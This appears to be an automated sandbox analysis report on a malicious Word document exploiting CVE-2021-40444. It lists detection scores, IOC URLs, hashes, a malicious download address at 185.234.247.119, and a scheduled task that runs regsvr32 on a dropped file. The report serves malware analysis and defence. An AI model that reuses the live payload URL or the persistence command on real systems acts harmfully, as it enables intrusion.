                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            doc782.docx29%VirustotalBrowse
                            doc782.docx17%ReversingLabsDocument-Office.Exploit.CVE-2021-40444

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll0%ReversingLabs
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui0%ReversingLabs

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            32.2.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.2.explorer.exe.2ec0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            32.0.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            33.0.explorer.exe.2e60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            29.2.regsvr32.exe.4af0000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.0.explorer.exe.2ec0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            28.2.regsvr32.exe.42f0000.3.unpack100%AviraHEUR/AGEN.1232827Download File
                            28.2.regsvr32.exe.42a0000.2.unpack100%AviraHEUR/AGEN.1234562Download File
                            27.2.regsvr32.exe.4420000.2.unpack100%AviraHEUR/AGEN.1232827Download File
                            27.2.regsvr32.exe.4990000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            38.2.regsvr32.exe.2d80000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                            33.2.explorer.exe.2e60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            29.2.regsvr32.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://roaming.edog.0%URL Reputationsafe
                            https://cdn.entity.0%URL Reputationsafe
                            https://powerlift.acompli.net0%URL Reputationsafe
                            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                            https://cortana.ai0%URL Reputationsafe
                            https://api.aadrm.com/0%URL Reputationsafe
                            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                            http://www.borland.com/namespaces/Types-IWSDLPublish0%Avira URL Cloudsafe
                            https://store.office.cn/addinstemplate0%URL Reputationsafe
                            https://api.aadrm.com0%URL Reputationsafe
                            http://185.234.247.119/123.RES2%VirustotalBrowse
                            http://185.234.247.119/123.RES0%Avira URL Cloudsafe
                            https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                            https://www.odwebp.svc.ms0%URL Reputationsafe
                            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                            http://185.234.247.119:80/123.RES2%VirustotalBrowse
                            http://185.234.247.119:80/123.RES0%Avira URL Cloudsafe
                            https://dataservice.o365filtering.com/0%URL Reputationsafe
                            https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish0%URL Reputationsafe
                            https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                            http://crl.micro0%URL Reputationsafe
                            https://ncus.contentsync.0%URL Reputationsafe
                            https://apis.live.net/v5.0/0%URL Reputationsafe
                            https://wus2.contentsync.0%URL Reputationsafe
                            http://www.borland.com/namespaces/TypesU0%URL Reputationsafe
                            https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                            http://www.borland.com/namespaces/Types0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typesp0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://185.234.247.119/123.REStrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                              		high
                              https://login.microsoftonline.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                		high
                                https://shell.suite.office.com:1443DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                  		high
                                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                      		high
                                      https://autodiscover-s.outlook.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                        		high
                                        https://roaming.edog.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                          		high
                                          https://cdn.entity.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.addins.omex.office.net/appinfo/queryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                            		high
                                            https://clients.config.office.net/user/v1.0/tenantassociationkeyDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                              		high
                                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                		high
                                                https://powerlift.acompli.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://rpsticket.partnerservices.getmicrosoftkey.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://lookup.onenote.com/lookup/geolocation/v1DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                  		high
                                                  https://cortana.aiDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                    		high
                                                    https://cloudfiles.onenote.com/upload.aspxDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                      		high
                                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                        		high
                                                        https://entitlement.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                          		high
                                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            		high
                                                            https://api.aadrm.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ofcrecsvcapi-int.azurewebsites.net/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/httpregsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                              		high
                                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                		high
                                                                https://api.microsoftstream.com/api/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                  		high
                                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                    		high
                                                                    https://cr.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                      		high
                                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://portal.office.com/account/?ref=ClientMeControlDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                        		high
                                                                        https://graph.ppe.windows.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          		high
                                                                          https://res.getmicrosoftkey.com/api/redemptioneventsDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://powerlift-frontdesk.acompli.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://tasks.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                            		high
                                                                            https://officeci.azurewebsites.net/api/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                              		high
                                                                              http://www.borland.com/namespaces/Types-IWSDLPublishregsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://store.office.cn/addinstemplateDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/soap/encoding/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                		high
                                                                                https://api.aadrm.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                  		high
                                                                                  https://globaldisco.crm.dynamics.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                    		high
                                                                                    https://messaging.engagement.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                      		high
                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        		high
                                                                                        https://dev0-api.acompli.net/autodetectDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.odwebp.svc.msDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://api.diagnosticssdf.office.com/v2/feedbackDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                          		high
                                                                                          https://api.powerbi.com/v1.0/myorg/groupsDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                            		high
                                                                                            https://web.microsoftstream.com/video/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                              		high
                                                                                              https://api.addins.store.officeppe.com/addinstemplateDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://185.234.247.119:80/123.RES~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.drfalse
                                                                                              • 2%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://graph.windows.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                		high
                                                                                                https://dataservice.o365filtering.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://officesetup.getmicrosoftkey.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublishexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://analysis.windows.net/powerbi/apiDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                  		high
                                                                                                  https://prod-global-autodetect.acompli.net/autodetectDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                    		high
                                                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                      		high
                                                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                        		high
                                                                                                        http://crl.micromsdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/wsdl/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                            		high
                                                                                                            https://ncus.contentsync.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                              		high
                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                		high
                                                                                                                http://weather.service.msn.com/data.aspxDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                  		high
                                                                                                                  https://apis.live.net/v5.0/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/mime/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                        		high
                                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                              		high
                                                                                                                              https://wus2.contentsync.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://incidents.diagnostics.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                		high
                                                                                                                                https://clients.config.office.net/user/v1.0/iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.borland.com/namespaces/TypesUexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://entitlement.diagnostics.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v2/initDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocationDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://outlook.office365.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://webshell.suite.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typespregsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://management.azure.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                      		high

                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public IPs

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      185.234.247.119
                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                      		198004INTERKONEKT-ASPLtrue

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                      Analysis ID:640940
                                                                                                                                                                      Start date and time: 07/06/202219:48:552022-06-07 19:48:55 +02:00
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 12m 54s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:light
                                                                                                                                                                      Sample file name:doc782.docx
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                                      Number of analysed new started processes analysed:41
                                                                                                                                                                      Number of new started drivers analysed:1
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winDOCX@31/32@0/2
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 15.4% (good quality ratio 14.6%)
                                                                                                                                                                      • Quality average: 77.3%
                                                                                                                                                                      • Quality standard deviation: 26.3%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .docx
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer

                                                                                                                                                                      Warnings

                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.38, 52.109.76.34, 52.109.12.23, 52.109.12.21, 52.109.12.22, 20.223.24.244
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      19:52:07Task SchedulerRun new task: swyghewz path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      No context

                                                                                                                                                                      Domains

                                                                                                                                                                      No context

                                                                                                                                                                      ASNs

                                                                                                                                                                      No context

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Microsoft Access Database
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):528384
                                                                                                                                                                      Entropy (8bit):0.475473229136101
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:hGfXQVJCC88SFyfZ0jGBtRe7JJWzwtZ1Ia+hVZO4Fg:kfX+ClHeZPaSz/5I
                                                                                                                                                                      MD5:766811A42870AEE1D9D9EDC5CF39B751
                                                                                                                                                                      SHA1:4CCD5DD755B159D32716FBBEECA2B33FC67B1466
                                                                                                                                                                      SHA-256:88640A8D62914E568A7ADA112DCC06DED81028F1375883BC60575D8BEC2F20D7
                                                                                                                                                                      SHA-512:B3CF99A75F5480D9FC6E60D2EBF0EABFC5C775CE7C7BDB7227D7A7149A63431BC2A602352A36B687D877410ECD661E044A22445ED2C96840A7AD439E90245E89
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|......6...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                      Entropy (8bit):2.730660070105504
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                      MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                      SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                      SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                      SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):1.4172860556164644
                                                                                                                                                                      Encrypted:false
